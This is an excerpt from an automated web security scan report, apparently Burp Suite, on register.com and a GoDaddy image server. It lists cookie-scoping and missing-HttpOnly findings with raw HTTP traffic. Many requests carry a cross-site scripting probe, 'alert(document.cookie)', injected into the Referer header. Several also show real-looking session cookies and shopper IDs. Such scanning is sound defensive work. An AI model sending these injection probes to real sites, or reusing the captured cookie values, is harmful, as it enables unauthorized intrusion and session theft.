Content-Type: text/css
Set-Cookie: TSfd06f3=d2937cbf720198647e74b325b537776034fb6f4d2b0d40564e629da2286023f234aaaa7a948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 172252

/* Register - basic.css
/* Register - basic.css
---------------------------------------*/
/*    1. Global Elements/Classes
       a. Browser Reset
       b. Font Definitions
       c. Element Styles
       d. Global Classe
...[SNIP]...

10.65. http://www.register.com/css/titan-screen.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.register.com
Path:   /css/titan-screen.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/titan-screen.css HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:10 GMT
Set-Cookie: TLTSID=BDC29F30D67410D61BCEC691FA7F6315; Path=/; Domain=.register.com
HostName: atleuapp05.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:23 GMT
ETag: "48e69-2c2c-4aba0176d51c0"
Accept-Ranges: bytes
Content-Length: 11308
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/css
Set-Cookie: TSfd06f3=674af69769fa119224d9d19bfb161e4634fb6f4d2b0d40564e629da2286023f2beb4fbf0948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/
Vary: Accept-Encoding, User-Agent
Connection: Keep-Alive

/*Thickbox - formerly thickbox.css
---------------------------------------*/
   /* **Added by HUGE** */
   
   .thickbox {
       visibility:hidden;
   }
   
   /* -----------------------------------------------------
...[SNIP]...

10.66. http://www.register.com/imgs/global/crtIcon.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.register.com
Path:   /imgs/global/crtIcon.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imgs/global/crtIcon.gif HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:12 GMT
Set-Cookie: TLTSID=BEBCC488D67410D6177BEE195E4E2E9D; Path=/; Domain=.register.com
HostName: atleuapp02.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:33 GMT
ETag: "c337a-1ab-4aba01805e840"
Accept-Ranges: bytes
Content-Length: 427
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: image/gif
Set-Cookie: TSfd06f3=989560f402c52ef6e5467a0378482f6234fb6f4d2b0d40564e629da2286023f235ed6f81948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

GIF89a.........z..............).....:..............[..H.....z..m..N..d..f...........{........................!.......,............'.di....+.m......8.a<.m..g..h...b...d...`.X.XA...`."NF.)..g...    n0.n`N.
...[SNIP]...

10.67. http://www.register.com/imgs/global/registerLogo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.register.com
Path:   /imgs/global/registerLogo.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imgs/global/registerLogo.gif HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:12 GMT
Set-Cookie: TLTSID=BEB0737CD67410D61C12CE72E6515F79; Path=/; Domain=.register.com
HostName: atleuapp05.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:30 GMT
ETag: "34e516-b9e-4aba017d82180"
Accept-Ranges: bytes
Content-Length: 2974
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: image/gif
Set-Cookie: TSfd06f3=36a9a6be0fb65991f3e0ada517cd8fc334fb6f4d2b0d40564e629da2286023f2d77d8819948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

GIF89aU.5.........o............b..7.r.............|Y.....?.qK................................................!.......,....U.5.... $.di.h....<...tm.x..|....p.z..@....:...tJ...F..'.
...xL......78d.H.|N.
...[SNIP]...

10.68. http://www.register.com/js/aop-attach.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.register.com
Path:   /js/aop-attach.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/aop-attach.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:12 GMT
Set-Cookie: TLTSID=BE9FF4FCD67410D61AE2879D611DB162; Path=/; Domain=.register.com
HostName: atleuapp03.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:22 GMT
ETag: "1256cd-605-4aba0175e0f80"
Accept-Ranges: bytes
Content-Length: 1541
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=153cfa4d0e155325732f47ed9bffcede34fb6f4d2b0d40564e629da2286023f28cb47c3f948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/


function unloadWin(evt){
   // We disable all popups unless the browser is IE
   var disablePopup = true;
   if(!evt) {
       // Yuck - check to see if the mouse cursor is in the general vicinity of where
       /
...[SNIP]...

10.69. http://www.register.com/js/global.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.register.com
Path:   /js/global.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/global.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:11 GMT
Set-Cookie: TLTSID=BDF05740D67410D61BCAF1EA8061C90E; Path=/; Domain=.register.com
HostName: atleuapp05.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:16 GMT
ETag: "14b215-beba-4aba017028200"
Accept-Ranges: bytes
Content-Length: 48826
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=980743b8ff4ec39c11121c1d3b73b51a34fb6f4d2b0d40564e629da2286023f23b79d92e948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

root_path = "/";
$(document).ready(function () {
   $.fn.hover = function (C, B) {
       function A(E) {
           var D = E.relatedTarget;
           while (D && D != this) {
               try {
                   D = D.parentNode;
               }
               ca
...[SNIP]...

10.70. http://www.register.com/js/jquery-1.3.2.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.register.com
Path:   /js/jquery-1.3.2.min.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/jquery-1.3.2.min.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:11 GMT
Set-Cookie: TLTSID=BDEEFB98D67410D61AB284001024AF96; Path=/; Domain=.register.com
HostName: atleuapp03.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:18 GMT
ETag: "14b223-dfa6-4aba017210680"
Accept-Ranges: bytes
Content-Length: 57254
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=e8f3561ae36189d24acc768ec35fb74a34fb6f4d2b0d40564e629da2286023f278b2737d948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...

10.71. http://www.register.com/js/jquery-ui-1.7.1.custom.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.register.com
Path:   /js/jquery-ui-1.7.1.custom.min.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/jquery-ui-1.7.1.custom.min.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:11 GMT
Set-Cookie: TLTSID=BDF9F0ACD67410D61D11B0753FBACCA0; Path=/; Domain=.register.com
HostName: atleuapp01.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:15 GMT
ETag: "1dfa9e-b6ad-4aba016f33fc0"
Accept-Ranges: bytes
Content-Length: 46765
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=301b647cf522da421558aacb50cc2aa234fb6f4d2b0d40564e629da2286023f26c256ffa948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

/*
* jQuery UI 1.7.1
*
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.
...[SNIP]...

10.72. http://www.register.com/js/jquery.cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.register.com
Path:   /js/jquery.cookie.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/jquery.cookie.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:11 GMT
Set-Cookie: TLTSID=BDF5A8C6D67410D617CC97B16A7B361F; Path=/; Domain=.register.com
HostName: atleuapp02.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:13 GMT
ETag: "14b21d-1096-4aba016d4bb40"
Accept-Ranges: bytes
Content-Length: 4246
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=4d632488d63df192acaddb778076d1e434fb6f4d2b0d40564e629da2286023f20d60c5e2948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...

10.73. http://www.register.com/js/jquery.jcarousellite.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.register.com
Path:   /js/jquery.jcarousellite.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/jquery.jcarousellite.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:11 GMT
Set-Cookie: TLTSID=BDEF2F14D67410D61AB7CB3A6F264AD2; Path=/; Domain=.register.com
HostName: atleuapp01.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:13 GMT
ETag: "14b226-8c3-4aba016d4bb40"
Accept-Ranges: bytes
Content-Length: 2243
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=6cb398fe6f3b95e43e8ce0909fb5138934fb6f4d2b0d40564e629da2286023f26b0cd9e2948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

(function(D){D.fn.jCarouselLite=function(E){E=D.extend({btnPrev:null,btnNext:null,btnGo:null,mouseWheel:false,auto:null,speed:200,easing:null,vertical:false,circular:true,visible:3,start:0,scroll:1,be
...[SNIP]...

10.74. http://www.register.com/js/mbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.register.com
Path:   /js/mbox.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/mbox.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:12 GMT
Set-Cookie: TLTSID=BE921B52D67410D610B7F5DDB44FC95E; Path=/; Domain=.register.com
HostName: atleuapp04.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:23 GMT
ETag: "14b217-5f99-4aba0176d51c0"
Accept-Ranges: bytes
Content-Length: 24473
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=c71c7a115bf6f15bfb96be371425b9f134fb6f4d2b0d40564e629da2286023f2951be06a948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

var mboxCopyright = "Copyright 1996-2009. Adobe Systems Incorporated. All rights reserved";mboxUrlBuilder = function(a, b) { this.a = a; this.b = b; this.c = new Array(); this.d = function(e) { return
...[SNIP]...

10.75. http://www.register.com/js/nicejforms.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.register.com
Path:   /js/nicejforms.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/nicejforms.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:12 GMT
Set-Cookie: TLTSID=BEB668E0D67410D61C0F8B256BAF5161; Path=/; Domain=.register.com
HostName: atleuapp05.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:23 GMT
ETag: "1dfaa1-1e84-4aba0176d51c0"
Accept-Ranges: bytes
Content-Length: 7812
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=f6bf8e381ccc97699cb09ef86948cfb734fb6f4d2b0d40564e629da2286023f20921a71a948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

jQuery.NiceJForms={options:{selectRightSideWidth:27,selectLeftSideWidth:1,selectAreaHeight:21,selectAreaOptionsOverlap:2,imagesPath:(typeof (root_path)!="undefined"?root_path:"/")+"imgs/formElements/"
...[SNIP]...

10.76. http://www.register.com/js/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.register.com
Path:   /js/s_code.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/s_code.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:12 GMT
Set-Cookie: TLTSID=BEBC2690D67410D6183AD437200921A1; Path=/; Domain=.register.com
HostName: atleuapp02.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:10 GMT
ETag: "1256cc-7ff7-4aba016a6f480"
Accept-Ranges: bytes
Content-Length: 32759
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=184443db25c7545d79e2025b8b0c50dd34fb6f4d2b0d40564e629da2286023f28ac38e07948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

/* SiteCatalyst code version: H.20.3.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */


var hostname = (top.location.host);
var s_account="";

switch(hostname) {
   
...[SNIP]...

10.77. http://www.register.com/js/thickbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.register.com
Path:   /js/thickbox.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/thickbox.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:12 GMT
Set-Cookie: TLTSID=BE922F8ED67410D61801BB428335AC70; Path=/; Domain=.register.com
HostName: atleuapp04.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:12 GMT
ETag: "1256c1-254b-4aba016c57900"
Accept-Ranges: bytes
Content-Length: 9547
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=af2d54c7f076f956f2dbdb3dbd2252bb34fb6f4d2b0d40564e629da2286023f2bc9f06c5948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

var tb_pathToImage="/imgs/global/loadingAnimation.gif";$(document).ready(function(){tb_init('a.thickbox, area.thickbox, input.thickbox');imgLoader=new Image();imgLoader.src=tb_pathToImage;$('.thickbo
...[SNIP]...

11. Cookie without HttpOnly flag set  previous  next
There are 98 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



11.1. http://img.godaddy.com/image.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://img.godaddy.com
Path:   /image.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /image.aspx?sitename=www.godaddy.com&server=M1PWCORPWEB109&shopper=46215684&privatelabelid=1&status=200&rand=0.781776874690213&page=%2fssl%2fssl-certificates.aspx&split=24 HTTP/1.1
Host: img.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=3&fMajorVer=10&slMajorVer=-1&slMinorVer=-1; pagecount=2; fb_pagecount=2; actioncount=; fb_actioncount=; app_pathway=; fb_session=S_TOUCH=09/03/2011 21:32:13&pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40&V_DATE=09/03/2011 14:28:59; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=M1PWCORPWEB109&status=200 OK&querystring=&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=8d587be0-834e-4a03-83dc-2f3bcb783a40&referringdomain=&split=24; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/gif
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
